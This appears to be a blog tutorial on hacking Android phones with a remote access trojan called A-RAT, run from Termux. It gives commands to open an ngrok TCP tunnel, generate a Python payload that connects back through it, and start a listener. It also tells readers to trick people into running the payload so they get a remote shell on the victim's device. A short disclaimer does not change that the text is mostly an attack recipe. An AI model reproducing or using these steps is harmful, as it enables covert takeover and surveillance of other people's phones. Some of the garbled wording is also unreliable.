-->

How to Hack Android Device Using AndroRAT



  • The android devices in the network can be hacked using Meterpreter Attack but most of the people are not aware that process is not safe, But for this sense we can use the AndroRAT(Android Remote Administration Tool) to hack any android device in the network.

    Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you. 

    Also Read: Hacking Android Devices using androrat with pc 

How to Hack Android Using A-RAT

First open your termux application and enter the command

$ ./ngrok tcp <port you want>

Example:

$ ./ngrok tcp 1337

Both of us make a new session and open the A-Rat Tools
Then we make the payload with the following command

$ set of HOST 0.tcp.ngrok.io
$ set PORT <port that is in the drop menu>
Here port 15497 appears, so it's the command
$ set PORT 15497
$ set OUTPUT / sdcard / <the payload name you want> .py
Example:
$ set OUTPUT /sdcard/idiotsec.py
$ generate
$ set HOST 127.0.0.1
$ set PORT <port that you previously forwarded>
Example:
$ set PORT 1337
$ run
after you have finished making the payload, now you send & tell people "so that you want to run the payload that you created earlier." If someone has made the payload that you made then there will be "A-Rat@127.0.0.1: ~ #"
After that it's up to you, what do you want to do with an Android victim that has been hit by RATs from you. here I want to check the victim's cell kernel info with the command "kernel_info"
For other commands you can type the "help" command without quotation marks to see the collection of commands "provided by the A-RAT

done.

Hope you loved this feel free to comment here 

Also Read

Post a Comment